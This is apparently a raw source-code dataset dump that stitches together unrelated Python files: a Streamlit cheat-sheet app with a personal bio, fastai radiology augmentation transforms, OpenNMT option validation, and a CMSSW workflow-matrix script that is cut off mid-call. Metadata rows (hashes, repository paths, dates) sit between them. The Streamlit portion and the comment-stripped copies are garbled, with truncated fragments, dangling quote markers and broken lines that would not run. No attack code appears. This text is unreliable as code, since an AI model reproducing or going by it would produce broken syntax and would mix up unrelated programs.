# >>> col1.subheader('Columnisation')
# st.expander('Expander')
# >>> with st.expander('Expand'):
# >>> st.write('Juicy deets')
# ''')
# col2.write('Batch widgets together in a form:')
# col2.code('''
# >>> with st.form(key='my_form'):
# >>> text_input = st.text_input(label='Enter some text')
# >>> submit_button = st.form_submit_button(label='Submit')
# ''')
# # Display code
# col2.subheader('Display code')
# col2.code('''
# st.echo()
# >>> with st.echo():
# >>> st.write('Code will be executed and printed')
# ''')
# # Display progress and status
# col2.subheader('Display progress and status')
# col2.code('''
# st.progress(progress_variable_1_to_100)
# st.spinner()
# >>> with st.spinner(text='In progress'):
# >>> time.sleep(5)
# >>> st.success('Done')
# st.balloons()
# st.error('Error message')
# st.warning('Warning message')
# st.info('Info message')
# st.success('Success message')
# st.exception(e)
# ''')
# # Placeholders, help, and options
# col2.subheader('Placeholders, help, and options')
# col2.code('''
# st.empty()
# >>> my_placeholder = st.empty()
# >>> my_placeholder.text('Replaced!')
# st.help(pandas.DataFrame)
# st.get_option(key)
# st.set_option(key, value)
# st.set_page_config(layout='wide')
# ''')
# # Mutate data
# col2.subheader('Mutate data')
# col2.code('''
# DeltaGenerator.add_rows(data)
# >>> my_table = st.table(df1)
# >>> my_table.add_rows(df2)
# >>> my_chart = st.line_chart(df1)
# >>> my_chart.add_rows(df2)
# ''')
# # Optimize performance
# col2.subheader('Optimize performance')
# col2.code('''
# @st.cache
# >>> @st.cache
# ... def fetch_and_clean_data(url):
# ... # Mutate data at url
# ... return data
# >>> # Executes d1 as first time
# >>> d1 = fetch_and_clean_data(ref1)
# >>> # Does not execute d1; returns cached value, d1==d2
# >>> d2 = fetch_and_clean_data(ref1)
# >>> # Different arg, so function d1 executes
# >>> d3 = fetch_and_clean_data(ref2)
# ''')
# col2.subheader('Other key parts of the API')
# col2.markdown('''
# <small>[State API](https://docs.streamlit.io/en/stable/session_state_api.html)</small><br>
# <small>[Theme option reference](https://docs.streamlit.io/en/stable/theme_options.html)</small><br>
# <small>[Components API reference](https://docs.streamlit.io/en/stable/develop_streamlit_components.html)</small><br>
# <small>[API cheat sheet](https://share.streamlit.io/daniellewisdl/streamlit-cheat-sheet/app.py)</small><br>
# ''', unsafe_allow_html=True)
# Column 3 TOC Generator
# col3.subheader('test')
# toc = Toc(col3)
# # col2.title("Table of contents")
# col3.write("http://localhost:8502/#display-progress-and-status", unsafe_allow_html=True)
# toc.header("Header 1")
# toc.header("Header 2")
# toc.generate()
# toc.subheader("Subheader 1")
# toc.subheader("Subheader 2")
# toc.generate()
# return None
# Run main()
# if __name__ == '__main__':
# main()
# def main():
def app():
# cs_sidebar()
cs_body()
return None
| 26.845921
| 228
| 0.658226
|
"""
Off Multipage Cheatsheet
https://github.com/daniellewisDL/streamlit-cheat-sheet
@daniellewisDL : https://github.com/daniellewisDL
"""
import streamlit as st
from pathlib import Path
import base64
from modules.toc import *
st.set_page_config(
page_title='Code Compendium Intro Page',
layout="wide",
)
def img_to_bytes(img_path):
img_bytes = Path(img_path).read_bytes()
encoded = base64.b64encode(img_bytes).decode()
return encoded
# <small>Summary of the [docs](https://docs.streamlit.io/en/stable/api.html), as of [Streamlit v1.0.0](https://www.streamlit.io/).</small>
# ''', unsafe_allow_html=True)
# st.sidebar.<widget>
# >>> a = st.sidebar.radio(\'R:\',[1,2])
# ''')
# $ streamlit --help
# $ streamlit run your_script.py
# $ streamlit hello
# $ streamlit config show
# $ streamlit cache clear
# $ streamlit docs
# $ streamlit --version
# ''')
# pip uninstall streamlit
# pip install streamlit-nightly --upgrade
# ''')
in.**
This webapp features the basic code snippets from all the "googling" from programming I have done.
I have taken the plunge and have created my own markdown notebooks organizing information from quick solution tidbits to documentation for programming languages.
Please visit my github for practical code and my research notebooks:
*[rypaik (Ryan Paik) · GitHub](https://github.com/rypaik)*
If you would like access to my Gist please email me.
ryanpaik@protonmail.com
-----
**Bio:**
Currently a Sophomore at University of Illinois at Urbana-Champaign
Working Nights on my degree from the System Engineering Program
**Hobbies:**
Trying to become a real guitar hero minus the game system, playing Valorant with the St Mark's crew, getting interesting eats no matter where I am, and playing toss with my baseball field rat of a cousin.
The newest hobby is figuring out what I can build with all the new breakthroughs in technology.
**Currently Working On**
Frameworks and Languages:
- Flask, Django, FastAPI, PyTorch, Streamlit, OpenCV, shell scripting, Python, C++
Databases:
- Postgres, Redis, MongoDB, and applicable ORMs
When I can get up for Air:
- React, swift(ios), Rust, GO!!
- Find a team to get a paper In Arxiv
**This site will be constantly updated as long as I program. Feel free to pass on the URL.**
''')
# col2.subheader('Display interactive widgets')
# col2.code('''
# st.button('Hit me')
# st.download_button('On the dl', data)
# st.checkbox('Check me out')
# st.radio('Radio', [1,2,3])
# st.selectbox('Select', [1,2,3])
# st.multiselect('Multiselect', [1,2,3])
# st.slider('Slide me', min_value=0, max_value=10)
# st.select_slider('Slide to select', options=[1,'2'])
# st.text_input('Enter some text')
# st.number_input('Enter a number')
# st.text_area('Area for textual entry')
# st.date_input('Date input')
# st.time_input('Time entry')
# st.file_uploader('File uploader')
# st.color_picker('Pick a color')
# ''')
# col2.write('Use widgets\' returned values in variables:')
# >>> for i in range(int(st.number_input('Num:'))): foo()
# >>> if st.sidebar.selectbox('I:',['f']) == 'f': b()
# >>> my_slider_val = st.slider('Quinn Mallory', 1, 88)
# >>> st.write(slider_val)
# ''')
)
# ''')
form_identifier')
# st.form_submit_button('Submit to me')
# st.container()
# st.columns(spec)
# >>> col1, col2 = st.columns(2)
# >>> col1.subheader('Columnisation')
# st.expander('Expander')
# >>> with st.expander('Expand'):
# >>> st.write('Juicy deets')
# ''')
# >>> with st.form(key='my_form'):
# >>> text_input = st.text_input(label='Enter some text')
# >>> submit_button = st.form_submit_button(label='Submit')
# ''')
)
# >>> with st.echo():
# >>> st.write('Code will be executed and printed')
# ''')
riable_1_to_100)
# st.spinner()
# >>> with st.spinner(text='In progress'):
# >>> time.sleep(5)
# >>> st.success('Done')
# st.balloons()
# st.error('Error message')
# st.warning('Warning message')
# st.info('Info message')
# st.success('Success message')
# st.exception(e)
# ''')
lder = st.empty()
# >>> my_placeholder.text('Replaced!')
# st.help(pandas.DataFrame)
# st.get_option(key)
# st.set_option(key, value)
# st.set_page_config(layout='wide')
# ''')
nerator.add_rows(data)
# >>> my_table = st.table(df1)
# >>> my_table.add_rows(df2)
# >>> my_chart = st.line_chart(df1)
# >>> my_chart.add_rows(df2)
# ''')
@st.cache
# ... def fetch_and_clean_data(url):
# ... # Mutate data at url
# ... return data
# >>> # Executes d1 as first time
# >>> d1 = fetch_and_clean_data(ref1)
# >>> # Does not execute d1; returns cached value, d1==d2
# >>> d2 = fetch_and_clean_data(ref1)
# >>> # Different arg, so function d1 executes
# >>> d3 = fetch_and_clean_data(ref2)
# ''')
# <small>[State API](https://docs.streamlit.io/en/stable/session_state_api.html)</small><br>
# <small>[Theme option reference](https://docs.streamlit.io/en/stable/theme_options.html)</small><br>
# <small>[Components API reference](https://docs.streamlit.io/en/stable/develop_streamlit_components.html)</small><br>
# <small>[API cheat sheet](https://share.streamlit.io/daniellewisdl/streamlit-cheat-sheet/app.py)</small><br>
# ''', unsafe_allow_html=True)
def app():
cs_body()
return None
| false
| true
|
790c4f569deac0e789782b59e58ef492e5915eaf
| 4,394
|
py
|
Python
|
train/tfms.py
|
lluissalord/radiology_ai
|
8b842502206f4bad53c2825beb1f58d2ed054d0d
|
[
"MIT"
] | 3
|
2021-02-08T10:58:22.000Z
|
2021-08-18T19:51:27.000Z
|
train/tfms.py
|
lluissalord/radiology_ai
|
8b842502206f4bad53c2825beb1f58d2ed054d0d
|
[
"MIT"
] | null | null | null |
train/tfms.py
|
lluissalord/radiology_ai
|
8b842502206f4bad53c2825beb1f58d2ed054d0d
|
[
"MIT"
] | null | null | null |
from fastai.data.all import IntToFloatTensor
from fastai.vision.learner import *
from fastai.vision.augment import *
from fastai.vision.core import PILImageBW, PILImage
from fastai.vision.data import *
from preprocessing.transforms import *
# from preprocessing.dicom import *
from preprocessing.misc import *
def get_item_tfms(run_params):
item_tfms = []
# if run_params['HIST_CLIPPING']:
# item_tfms.append(XRayPreprocess(PIL_cls=PILImageBW, cut_min=run_params['HIST_CLIPPING_CUT_MIN'], cut_max=run_params['HIST_CLIPPING_CUT_MAX'], np_input=len(item_tfms) > 0, np_output=True))
if run_params["KNEE_LOCALIZER"]:
item_tfms.append(
KneeLocalizer(
run_params["KNEE_SVM_MODEL_PATH"],
PIL_cls=PILImageBW,
resize=run_params["RESIZE"],
np_input=len(item_tfms) > 0,
np_output=True,
)
)
else:
item_tfms.append(
Resize(
run_params["RESIZE"], method=ResizeMethod.Pad, pad_mode=PadMode.Zeros
)
)
if run_params["BACKGROUND_PREPROCESS"]:
item_tfms.append(
BackgroundPreprocess(
PIL_cls=PILImageBW, np_input=len(item_tfms) > 0, np_output=True
)
)
# item_tfms.append(RandomResizedCrop(RANDOM_RESIZE_CROP))
# Histogram scaling DICOM on the fly
if run_params["CLAHE_SCALED"]:
item_tfms.append(
CLAHE_Transform(
PIL_cls=PILImageBW,
grayscale=not run_params["SELF_SUPERVISED"],
np_input=len(item_tfms) > 0,
np_output=False,
)
)
elif run_params["HIST_SCALED"]:
if run_params["HIST_SCALED_SELF"]:
bins = None
else:
# bins = init_bins(fnames=L(list(final_df['Original'].values)), n_samples=100)
all_valid_raw_preprocess = pd.concat(
[pd.Series(unlabel_all_df.index), label_df["Raw_preprocess"]]
)
bins = init_bins(
fnames=L(list(all_valid_raw_preprocess.values)),
n_samples=100,
isDCM=False,
)
# item_tfms.append(HistScaled(bins))
item_tfms.append(HistScaled_all(bins))
return item_tfms
def get_batch_tfms(run_params):
label_tfms = [
IntToFloatTensor(div=2 ** 16 - 1),
*aug_transforms(
pad_mode=PadMode.Zeros,
mult=1.0,
do_flip=True,
flip_vert=False,
max_rotate=90.0,
min_zoom=0.9,
max_zoom=1.2,
max_lighting=0.4,
max_warp=0.4,
p_affine=0.9,
p_lighting=0.9,
mode="bilinear",
align_corners=True,
),
RandomResizedCropGPU(
run_params["RANDOM_RESIZE_CROP"], min_scale=run_params["RANDOM_MIN_SCALE"]
),
# Normalize() # Issue with CPU vs GPU interaction
]
unlabel_tfms = [[IntToFloatTensor(div=2 ** 16 - 1)]]
if run_params["SSL"] == run_params["SSL_FIX_MATCH"]:
weak_transform = [
IntToFloatTensor(div=1),
RandomResizedCropGPU(
run_params["RANDOM_RESIZE_CROP"],
min_scale=run_params["RANDOM_MIN_SCALE"],
),
Flip(),
# Normalize()
]
unlabel_tfms.append(weak_transform)
strong_transform = [
IntToFloatTensor(div=1),
RandomResizedCropGPU(
run_params["RANDOM_RESIZE_CROP"],
min_scale=run_params["RANDOM_MIN_SCALE"],
),
Flip(),
Rotate(180),
Brightness(),
Contrast(),
RandomErasing(),
# Normalize()
]
unlabel_tfms.append(strong_transform)
elif run_params["SSL"] == run_params["SSL_MIX_MATCH"]:
unlabel_transform = [
IntToFloatTensor(div=2 ** 16 - 1),
RandomResizedCropGPU(
run_params["RANDOM_RESIZE_CROP"],
min_scale=run_params["RANDOM_MIN_SCALE"],
),
Flip(),
Rotate(180),
Brightness(),
Contrast(),
# Normalize()
]
unlabel_tfms.append(unlabel_transform)
return label_tfms, unlabel_tfms
| 30.303448
| 197
| 0.561447
|
from fastai.data.all import IntToFloatTensor
from fastai.vision.learner import *
from fastai.vision.augment import *
from fastai.vision.core import PILImageBW, PILImage
from fastai.vision.data import *
from preprocessing.transforms import *
from preprocessing.misc import *
def get_item_tfms(run_params):
item_tfms = []
if run_params["KNEE_LOCALIZER"]:
item_tfms.append(
KneeLocalizer(
run_params["KNEE_SVM_MODEL_PATH"],
PIL_cls=PILImageBW,
resize=run_params["RESIZE"],
np_input=len(item_tfms) > 0,
np_output=True,
)
)
else:
item_tfms.append(
Resize(
run_params["RESIZE"], method=ResizeMethod.Pad, pad_mode=PadMode.Zeros
)
)
if run_params["BACKGROUND_PREPROCESS"]:
item_tfms.append(
BackgroundPreprocess(
PIL_cls=PILImageBW, np_input=len(item_tfms) > 0, np_output=True
)
)
if run_params["CLAHE_SCALED"]:
item_tfms.append(
CLAHE_Transform(
PIL_cls=PILImageBW,
grayscale=not run_params["SELF_SUPERVISED"],
np_input=len(item_tfms) > 0,
np_output=False,
)
)
elif run_params["HIST_SCALED"]:
if run_params["HIST_SCALED_SELF"]:
bins = None
else:
all_valid_raw_preprocess = pd.concat(
[pd.Series(unlabel_all_df.index), label_df["Raw_preprocess"]]
)
bins = init_bins(
fnames=L(list(all_valid_raw_preprocess.values)),
n_samples=100,
isDCM=False,
)
item_tfms.append(HistScaled_all(bins))
return item_tfms
def get_batch_tfms(run_params):
label_tfms = [
IntToFloatTensor(div=2 ** 16 - 1),
*aug_transforms(
pad_mode=PadMode.Zeros,
mult=1.0,
do_flip=True,
flip_vert=False,
max_rotate=90.0,
min_zoom=0.9,
max_zoom=1.2,
max_lighting=0.4,
max_warp=0.4,
p_affine=0.9,
p_lighting=0.9,
mode="bilinear",
align_corners=True,
),
RandomResizedCropGPU(
run_params["RANDOM_RESIZE_CROP"], min_scale=run_params["RANDOM_MIN_SCALE"]
),
loatTensor(div=2 ** 16 - 1)]]
if run_params["SSL"] == run_params["SSL_FIX_MATCH"]:
weak_transform = [
IntToFloatTensor(div=1),
RandomResizedCropGPU(
run_params["RANDOM_RESIZE_CROP"],
min_scale=run_params["RANDOM_MIN_SCALE"],
),
Flip(),
]
unlabel_tfms.append(weak_transform)
strong_transform = [
IntToFloatTensor(div=1),
RandomResizedCropGPU(
run_params["RANDOM_RESIZE_CROP"],
min_scale=run_params["RANDOM_MIN_SCALE"],
),
Flip(),
Rotate(180),
Brightness(),
Contrast(),
RandomErasing(),
]
unlabel_tfms.append(strong_transform)
elif run_params["SSL"] == run_params["SSL_MIX_MATCH"]:
unlabel_transform = [
IntToFloatTensor(div=2 ** 16 - 1),
RandomResizedCropGPU(
run_params["RANDOM_RESIZE_CROP"],
min_scale=run_params["RANDOM_MIN_SCALE"],
),
Flip(),
Rotate(180),
Brightness(),
Contrast(),
]
unlabel_tfms.append(unlabel_transform)
return label_tfms, unlabel_tfms
| true
| true
|
790c5016a7012f3bdea209e0d82aeb0e30f0aae5
| 5,783
|
py
|
Python
|
onmt/utils/parse.py
|
ACL2020-Submission/ACL2020
|
2a3d6e26d22c650cad823c68b65ee315aa1fe22c
|
[
"MIT"
] | null | null | null |
onmt/utils/parse.py
|
ACL2020-Submission/ACL2020
|
2a3d6e26d22c650cad823c68b65ee315aa1fe22c
|
[
"MIT"
] | null | null | null |
onmt/utils/parse.py
|
ACL2020-Submission/ACL2020
|
2a3d6e26d22c650cad823c68b65ee315aa1fe22c
|
[
"MIT"
] | null | null | null |
import configargparse as cfargparse
import os
import torch
import onmt.opts as opts
from onmt.utils.logging import logger
class ArgumentParser(cfargparse.ArgumentParser):
def __init__(
self,
config_file_parser_class=cfargparse.YAMLConfigFileParser,
formatter_class=cfargparse.ArgumentDefaultsHelpFormatter,
**kwargs):
super(ArgumentParser, self).__init__(
config_file_parser_class=config_file_parser_class,
formatter_class=formatter_class,
**kwargs)
@classmethod
def defaults(cls, *args):
"""Get default arguments added to a parser by all ``*args``."""
dummy_parser = cls()
for callback in args:
callback(dummy_parser)
defaults = dummy_parser.parse_known_args([])[0]
return defaults
@classmethod
def update_model_opts(cls, model_opt):
if model_opt.word_vec_size > 0:
model_opt.src_word_vec_size = model_opt.word_vec_size
model_opt.tgt_word_vec_size = model_opt.word_vec_size
if model_opt.layers > 0:
model_opt.enc_layers = model_opt.layers
model_opt.dec_layers = model_opt.layers
if model_opt.rnn_size > 0:
model_opt.enc_rnn_size = model_opt.rnn_size
model_opt.dec_rnn_size = model_opt.rnn_size
model_opt.brnn = model_opt.encoder_type == "brnn"
if model_opt.copy_attn_type is None:
model_opt.copy_attn_type = model_opt.global_attention
@classmethod
def validate_model_opts(cls, model_opt):
assert model_opt.model_type in ["text", "img", "audio", "vec"], \
"Unsupported model type %s" % model_opt.model_type
# this check is here because audio allows the encoder and decoder to
# be different sizes, but other model types do not yet
same_size = model_opt.enc_rnn_size == model_opt.dec_rnn_size
assert model_opt.model_type == 'audio' or same_size, \
"The encoder and decoder rnns must be the same size for now"
assert model_opt.rnn_type != "SRU" or model_opt.gpu_ranks, \
"Using SRU requires -gpu_ranks set."
if model_opt.share_embeddings:
if model_opt.model_type != "text":
raise AssertionError(
"--share_embeddings requires --model_type text.")
@classmethod
def ckpt_model_opts(cls, ckpt_opt):
# Load default opt values, then overwrite with the opts in
# the checkpoint. That way, if there are new options added,
# the defaults are used.
opt = cls.defaults(opts.model_opts)
opt.__dict__.update(ckpt_opt.__dict__)
return opt
@classmethod
def validate_train_opts(cls, opt):
if opt.epochs:
raise AssertionError(
"-epochs is deprecated please use -train_steps.")
if opt.truncated_decoder > 0 and max(opt.accum_count) > 1:
raise AssertionError("BPTT is not compatible with -accum > 1")
if opt.gpuid:
raise AssertionError(
"gpuid is deprecated see world_size and gpu_ranks")
if torch.cuda.is_available() and not opt.gpu_ranks:
logger.info("WARNING: You have a CUDA device, \
should run with -gpu_ranks")
if opt.world_size < len(opt.gpu_ranks):
raise AssertionError(
"parameter counts of -gpu_ranks must be less or equal "
"than -world_size.")
if opt.world_size == len(opt.gpu_ranks) and \
min(opt.gpu_ranks) > 0:
raise AssertionError(
"-gpu_ranks should have master(=0) rank "
"unless -world_size is greater than len(gpu_ranks).")
assert len(opt.data_ids) == len(opt.data_weights), \
"Please check -data_ids and -data_weights options!"
assert len(opt.dropout) == len(opt.dropout_steps), \
"Number of dropout values must match accum_steps values"
assert len(opt.attention_dropout) == len(opt.dropout_steps), \
"Number of attention_dropout values must match accum_steps values"
@classmethod
def validate_translate_opts(cls, opt):
if opt.beam_size != 1 and opt.random_sampling_topk != 1:
raise ValueError('Can either do beam search OR random sampling.')
@classmethod
def validate_preprocess_args(cls, opt):
assert opt.max_shard_size == 0, \
"-max_shard_size is deprecated. Please use \
-shard_size (number of examples) instead."
assert opt.shuffle == 0, \
"-shuffle is not implemented. Please shuffle \
your data before pre-processing."
assert len(opt.train_src) == len(opt.train_tgt), \
"Please provide same number of src and tgt train files!"
assert len(opt.train_src) == len(opt.train_ids), \
"Please provide proper -train_ids for your data!"
for file in opt.train_src + opt.train_tgt:
assert os.path.isfile(file), "Please check path of %s" % file
assert not opt.valid_src or os.path.isfile(opt.valid_src), \
"Please check path of your valid src file!"
assert not opt.valid_tgt or os.path.isfile(opt.valid_tgt), \
"Please check path of your valid tgt file!"
assert not opt.src_vocab or os.path.isfile(opt.src_vocab), \
"Please check path of your src vocab!"
assert not opt.tgt_vocab or os.path.isfile(opt.tgt_vocab), \
"Please check path of your tgt vocab!"
| 41.307143
| 79
| 0.6175
|
import configargparse as cfargparse
import os
import torch
import onmt.opts as opts
from onmt.utils.logging import logger
class ArgumentParser(cfargparse.ArgumentParser):
def __init__(
self,
config_file_parser_class=cfargparse.YAMLConfigFileParser,
formatter_class=cfargparse.ArgumentDefaultsHelpFormatter,
**kwargs):
super(ArgumentParser, self).__init__(
config_file_parser_class=config_file_parser_class,
formatter_class=formatter_class,
**kwargs)
@classmethod
def defaults(cls, *args):
dummy_parser = cls()
for callback in args:
callback(dummy_parser)
defaults = dummy_parser.parse_known_args([])[0]
return defaults
@classmethod
def update_model_opts(cls, model_opt):
if model_opt.word_vec_size > 0:
model_opt.src_word_vec_size = model_opt.word_vec_size
model_opt.tgt_word_vec_size = model_opt.word_vec_size
if model_opt.layers > 0:
model_opt.enc_layers = model_opt.layers
model_opt.dec_layers = model_opt.layers
if model_opt.rnn_size > 0:
model_opt.enc_rnn_size = model_opt.rnn_size
model_opt.dec_rnn_size = model_opt.rnn_size
model_opt.brnn = model_opt.encoder_type == "brnn"
if model_opt.copy_attn_type is None:
model_opt.copy_attn_type = model_opt.global_attention
@classmethod
def validate_model_opts(cls, model_opt):
assert model_opt.model_type in ["text", "img", "audio", "vec"], \
"Unsupported model type %s" % model_opt.model_type
same_size = model_opt.enc_rnn_size == model_opt.dec_rnn_size
assert model_opt.model_type == 'audio' or same_size, \
"The encoder and decoder rnns must be the same size for now"
assert model_opt.rnn_type != "SRU" or model_opt.gpu_ranks, \
"Using SRU requires -gpu_ranks set."
if model_opt.share_embeddings:
if model_opt.model_type != "text":
raise AssertionError(
"--share_embeddings requires --model_type text.")
@classmethod
def ckpt_model_opts(cls, ckpt_opt):
opt = cls.defaults(opts.model_opts)
opt.__dict__.update(ckpt_opt.__dict__)
return opt
@classmethod
def validate_train_opts(cls, opt):
if opt.epochs:
raise AssertionError(
"-epochs is deprecated please use -train_steps.")
if opt.truncated_decoder > 0 and max(opt.accum_count) > 1:
raise AssertionError("BPTT is not compatible with -accum > 1")
if opt.gpuid:
raise AssertionError(
"gpuid is deprecated see world_size and gpu_ranks")
if torch.cuda.is_available() and not opt.gpu_ranks:
logger.info("WARNING: You have a CUDA device, \
should run with -gpu_ranks")
if opt.world_size < len(opt.gpu_ranks):
raise AssertionError(
"parameter counts of -gpu_ranks must be less or equal "
"than -world_size.")
if opt.world_size == len(opt.gpu_ranks) and \
min(opt.gpu_ranks) > 0:
raise AssertionError(
"-gpu_ranks should have master(=0) rank "
"unless -world_size is greater than len(gpu_ranks).")
assert len(opt.data_ids) == len(opt.data_weights), \
"Please check -data_ids and -data_weights options!"
assert len(opt.dropout) == len(opt.dropout_steps), \
"Number of dropout values must match accum_steps values"
assert len(opt.attention_dropout) == len(opt.dropout_steps), \
"Number of attention_dropout values must match accum_steps values"
@classmethod
def validate_translate_opts(cls, opt):
if opt.beam_size != 1 and opt.random_sampling_topk != 1:
raise ValueError('Can either do beam search OR random sampling.')
@classmethod
def validate_preprocess_args(cls, opt):
assert opt.max_shard_size == 0, \
"-max_shard_size is deprecated. Please use \
-shard_size (number of examples) instead."
assert opt.shuffle == 0, \
"-shuffle is not implemented. Please shuffle \
your data before pre-processing."
assert len(opt.train_src) == len(opt.train_tgt), \
"Please provide same number of src and tgt train files!"
assert len(opt.train_src) == len(opt.train_ids), \
"Please provide proper -train_ids for your data!"
for file in opt.train_src + opt.train_tgt:
assert os.path.isfile(file), "Please check path of %s" % file
assert not opt.valid_src or os.path.isfile(opt.valid_src), \
"Please check path of your valid src file!"
assert not opt.valid_tgt or os.path.isfile(opt.valid_tgt), \
"Please check path of your valid tgt file!"
assert not opt.src_vocab or os.path.isfile(opt.src_vocab), \
"Please check path of your src vocab!"
assert not opt.tgt_vocab or os.path.isfile(opt.tgt_vocab), \
"Please check path of your tgt vocab!"
| true
| true
|
790c5028cb5c7b0ac170367e3ba00736ba805ec9
| 14,528
|
py
|
Python
|
Configuration/PyReleaseValidation/scripts/runTheMatrix.py
|
NTrevisani/cmssw
|
a212a27526f34eb9507cf8b875c93896e6544781
|
[
"Apache-2.0"
] | 1
|
2020-06-08T11:39:24.000Z
|
2020-06-08T11:39:24.000Z
|
Configuration/PyReleaseValidation/scripts/runTheMatrix.py
|
NTrevisani/cmssw
|
a212a27526f34eb9507cf8b875c93896e6544781
|
[
"Apache-2.0"
] | null | null | null |
Configuration/PyReleaseValidation/scripts/runTheMatrix.py
|
NTrevisani/cmssw
|
a212a27526f34eb9507cf8b875c93896e6544781
|
[
"Apache-2.0"
] | 1
|
2020-07-26T16:42:20.000Z
|
2020-07-26T16:42:20.000Z
|
#!/usr/bin/env python
from __future__ import print_function
import sys
from Configuration.PyReleaseValidation.MatrixReader import MatrixReader
from Configuration.PyReleaseValidation.MatrixRunner import MatrixRunner
from Configuration.PyReleaseValidation.MatrixInjector import MatrixInjector,performInjectionOptionTest
# ================================================================================
def showRaw(opt):
mrd = MatrixReader(opt)
mrd.showRaw(opt.useInput, opt.refRel, opt.fromScratch, opt.raw, opt.step1Only, selected=opt.testList)
return 0
# ================================================================================
def runSelected(opt):
mrd = MatrixReader(opt)
mrd.prepare(opt.useInput, opt.refRel, opt.fromScratch)
# test for wrong input workflows
if opt.testList:
definedWF = []
for dwf in mrd.workFlows: definedWF.append(dwf.numId)
for twf in opt.testList:
if twf not in definedWF: raise ValueError('Not defined workflow ', twf , ' requested')
ret = 0
if opt.show:
mrd.show(opt.testList, opt.extended, opt.cafVeto)
if opt.testList : print('testListected items:', opt.testList)
else:
mRunnerHi = MatrixRunner(mrd.workFlows, opt.nProcs, opt.nThreads)
ret = mRunnerHi.runTests(opt)
if opt.wmcontrol:
if ret!=0:
print('Cannot go on with wmagent injection with failing workflows')
else:
wfInjector = MatrixInjector(opt,mode=opt.wmcontrol,options=opt.wmoptions)
ret= wfInjector.prepare(mrd,
mRunnerHi.runDirs)
if ret==0:
wfInjector.upload()
wfInjector.submit()
return ret
# ================================================================================
if __name__ == '__main__':
#this can get out of here
predefinedSet={
'limited' : [5.1, #FastSim ttbar
7.3, #CosmicsSPLoose_UP17
8, #BH/Cosmic MC
25, #MC ttbar
4.22, #cosmic data
4.53, #run1 data + miniAOD
9.0, #Higgs200 charged taus
1000, #data+prompt
1001, #data+express
101.0, #SingleElectron120E120EHCAL
136.731, #2016B Photon data
136.7611, #2016E JetHT reMINIAOD from 80X legacy
136.8311, #2017F JetHT reMINIAOD from 94X reprocessing
136.788, #2017B Photon data
136.85, #2018A Egamma data
140.53, #2011 HI data
140.56, #2018 HI data
158.0, #2018 HI MC with pp-like reco
1306.0, #SingleMu Pt1 UP15
1325.7, #test NanoAOD from existing MINI
1330, #Run2 MC Zmm
135.4, #Run 2 Zee ttbar
10042.0, #2017 ZMM
10024.0, #2017 ttbar
10224.0, #2017 ttbar PU
10824.0, #2018 ttbar
11634.0, #2021 ttbar
12434.0, #2023 ttbar
20034.0, #2026D35 ttbar (MTD TDR baseline)
20434.0, #2026D41 ttbar (L1T TDR baseline)
21234.0, #2026D44 (exercise HF nose)
22034.0, #2026D46 ttbar (exercise V11 HGCal)
25202.0, #2016 ttbar UP15 PU
250202.181, #2018 ttbar stage1 + stage2 premix
],
'jetmc': [5.1, 13, 15, 25, 38, 39], #MC
'metmc' : [5.1, 15, 25, 37, 38, 39], #MC
'muonmc' : [5.1, 124.4, 124.5, 20, 21, 22, 23, 25, 30], #MC
}
import optparse
usage = 'usage: runTheMatrix.py --show -s '
parser = optparse.OptionParser(usage)
parser.add_option('-b','--batchName',
help='relval batch: suffix to be appended to Campaign name',
dest='batchName',
default=''
)
parser.add_option('-m','--memoryOffset',
help='memory of the wf for single core',
dest='memoryOffset',
default=3000
)
parser.add_option('--addMemPerCore',
help='increase of memory per each n > 1 core: memory(n_core) = memoryOffset + (n_core-1) * memPerCore',
dest='memPerCore',
default=1500
)
parser.add_option('-j','--nproc',
help='number of processes. 0 Will use 4 processes, not execute anything but create the wfs',
dest='nProcs',
default=4
)
parser.add_option('-t','--nThreads',
help='number of threads per process to use in cmsRun.',
dest='nThreads',
default=1
)
parser.add_option('-n','--showMatrix',
help='Only show the worflows. Use --ext to show more',
dest='show',
default=False,
action='store_true'
)
parser.add_option('-e','--extended',
help='Show details of workflows, used with --show',
dest='extended',
default=False,
action='store_true'
)
parser.add_option('-s','--selected',
help='Run a pre-defined selected matrix of wf. Deprecated, please use -l limited',
dest='restricted',
default=False,
action='store_true'
)
parser.add_option('-l','--list',
help='Coma separated list of workflow to be shown or ran. Possible keys are also '+str(predefinedSet.keys())+'. and wild card like muon, or mc',
dest='testList',
default=None
)
parser.add_option('-r','--raw',
help='Temporary dump the .txt needed for prodAgent interface. To be discontinued soon. Argument must be the name of the set (standard, pileup,...)',
dest='raw'
)
parser.add_option('-i','--useInput',
help='Use recyling where available. Either all, or a coma separated list of wf number.',
dest='useInput',
default=None
)
parser.add_option('-w','--what',
help='Specify the set to be used. Argument must be the name of the set (standard, pileup,...)',
dest='what',
default='all'
)
parser.add_option('--step1',
help='Used with --raw. Limit the production to step1',
dest='step1Only',
default=False
)
parser.add_option('--maxSteps',
help='Only run maximum on maxSteps. Used when we are only interested in first n steps.',
dest='maxSteps',
default=9999,
type="int"
)
parser.add_option('--fromScratch',
help='Coma separated list of wf to be run without recycling. all is not supported as default.',
dest='fromScratch',
default=None
)
parser.add_option('--refRelease',
help='Allow to modify the recycling dataset version',
dest='refRel',
default=None
)
parser.add_option('--wmcontrol',
help='Create the workflows for injection to WMAgent. In the WORKING. -wmcontrol init will create the the workflows, -wmcontrol test will dryRun a test, -wmcontrol submit will submit to wmagent',
choices=['init','test','submit','force'],
dest='wmcontrol',
default=None,
)
parser.add_option('--revertDqmio',
help='When submitting workflows to wmcontrol, force DQM outout to use pool and not DQMIO',
choices=['yes','no'],
dest='revertDqmio',
default='no',
)
parser.add_option('--optionswm',
help='Specify a few things for wm injection',
default='',
dest='wmoptions')
parser.add_option('--keep',
help='allow to specify for which coma separated steps the output is needed',
default=None)
parser.add_option('--label',
help='allow to give a special label to the output dataset name',
default='')
parser.add_option('--command',
help='provide a way to add additional command to all of the cmsDriver commands in the matrix',
dest='command',
default=None
)
parser.add_option('--apply',
help='allow to use the --command only for 1 coma separeated',
dest='apply',
default=None)
parser.add_option('--workflow',
help='define a workflow to be created or altered from the matrix',
action='append',
dest='workflow',
default=None
)
parser.add_option('--dryRun',
help='do not run the wf at all',
action='store_true',
dest='dryRun',
default=False
)
parser.add_option('--testbed',
help='workflow injection to cmswebtest (you need dedicated rqmgr account)',
dest='testbed',
default=False,
action='store_true'
)
parser.add_option('--noCafVeto',
help='Run from any source, ignoring the CAF label',
dest='cafVeto',
default=True,
action='store_false'
)
parser.add_option('--overWrite',
help='Change the content of a step for another. List of pairs.',
dest='overWrite',
default=None
)
parser.add_option('--noRun',
help='Remove all run list selection from wfs',
dest='noRun',
default=False,
action='store_true')
parser.add_option('--das-options',
help='Options to be passed to dasgoclient.',
dest='dasOptions',
